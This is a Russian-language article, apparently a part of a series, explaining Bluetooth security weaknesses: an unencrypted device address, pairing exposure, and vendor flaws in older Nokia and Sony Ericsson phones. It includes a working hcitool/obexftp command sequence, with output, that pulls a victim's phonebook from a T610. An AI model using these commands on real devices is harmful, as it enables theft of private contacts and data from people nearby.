Обнаружение адреса в процессе связи
Адрес Bluetooth устройства так же может быть
получен в процессе связи устройства с
окружающими, адрес не шифруется даже если
пользовтаель выбрал шифрование для всей
остальной связи. Это одна из важнейших
проблем в спецификации Bluetooth. "Скачки"
частоты (1600 в секунду) обеспечивают
начальную защиту для адреса в процессе
связи. Однако, последовательность смены
частоты на самом деле лишь псевдо-случайна
и хакер с подобающим оборудование может
синхронизироваться с оборудованием. Кроме
того смена частоты одинакова для всей
подсети Bluetooth устройств (напомню, что их
может быть до 8 в сети), что так же может дать
преимущество нападающему. На рынке уже есть
устройства, которые могут перехватывать
Bluetooth так сказать из воздуха, но стоят они
около 10.000 долларов, что конечно несколько
дороговато для обычного хакера.
Еще одна неприятность Bluetooth связана с тем,
что для "спаривания" двух устройств по
радио необходимо перевести как минимум
одно из них в "обнаруживаемый" режим
хотя бы на непродолжительное время. За это
время хакер может просканировать эфир и
определить адреса устройств. Ни одно из
существующих устройств в настоящий момент
не позволяет связываться с другим просто по
адресу. Таким образом складывается
ситуация, что если вы хотите что бы Bluetooth
работал - надо открыть его для всех. Однажды
раскрыв адрес окружающим вы уже не будете в
безопасности. Bluetooth адрес невозможно
сменить вручную, так что один раз узнав
адрес вашего телефона хакер уже навсегда
будет связан с ним.
Соединение Bluetooth и безопасность
Большинство пользователей Bluetooth
сталкиваются с безопасностью именно во
время соединения устройств. По умолчанию
соединения не аутентифицируются и любое
устройство может связываться с любым.
Естественно, для доступа к частной
информации все-таки авторизация требуется.
Обычно она проходит на стадии соединения
вводом PIN кода на устройстве:
Однажды соединившись и введя пароль,
пользователь создает на обоих устройства
ключ, который может хранится в памяти и в
дальнейшем позволит обходить процесс
авторизации при последующих соединениях.
Производители
К сожалению, не всегда процесс
авторизации правильно реализуется
производителями Bluetooth устройств.
Уязвимости найдены в телефонах Sony Ericsson и Nokia,
они позволяют хакерам утаскивать с них
телефонные книги, фотографии, информацию
календарей, в ряде случаев даже делать
звонки или посылать SMS. Для того, что бы
представить степень опасности вообразите
что кто-то взломал ваш телефон и послал SMS ну
скажем в полицию, с информацией о
заложенной бомбе. Логи Bluetooth соединений
естественно на телефоне никакие не ведутся,
копии SMS, посланных через Bluetooth AT команды, на
большинстве телефонов не сохраняются - а
биллинговые записи однозначно указывают на
ваш телефон. Так что виноваты по любому...
Уязвимости в телефонах Nokia и Sony Ericsson легко
использовать, тут не нужны даже особые
знания. Любой мало-мальски разбирающийся в
использовании Bluetooth в Linux с легкостью влезет
в чужой телефон. Для кражи телефонной книги
с Т610 достаточно всего двух стандартных
команд:
# hcitool scan
Scanning .
00:0A:D9:15:0B:1C T610-phone
# obexftp -b 00:0A:D9:15:0B:1C --channel 10 -g telecom/pb.vcf -v
Browsing 00:0A:D9:15:0B:1C ...
Channel: 7
No custom transport
Connecting...bt: 1
done
Receiving telecom/pb.vcf...\done
Disconnecting...done
Очевидно, что hcitool и obexftp тут стандартные
команды Bluetooth, доступные практически
каждому пользователю Linux. Уязвимость была
обнаружена человеком по имени Adam Laurie и
применима на многих телефонах: Nokia 6310, 6310i,
8910, 8910i, Sony Ericsson T68, T68i, R520m, T610, Z600 и других.
Широкое освещение уязвимость получила на
сайте trifinite.group,
которая даже разработала программу для
автоматизации проникновения - Blooover.
От производителей конечно же уже есть
обновления, однако люди, в большинстве
своем не желающие апдейтить операционные
системы, вряд ли озаботятся обновлением
телефона. Так что поиск уязвимых телефонов
в округе - лишь вопрос умения.
Продолжение следует...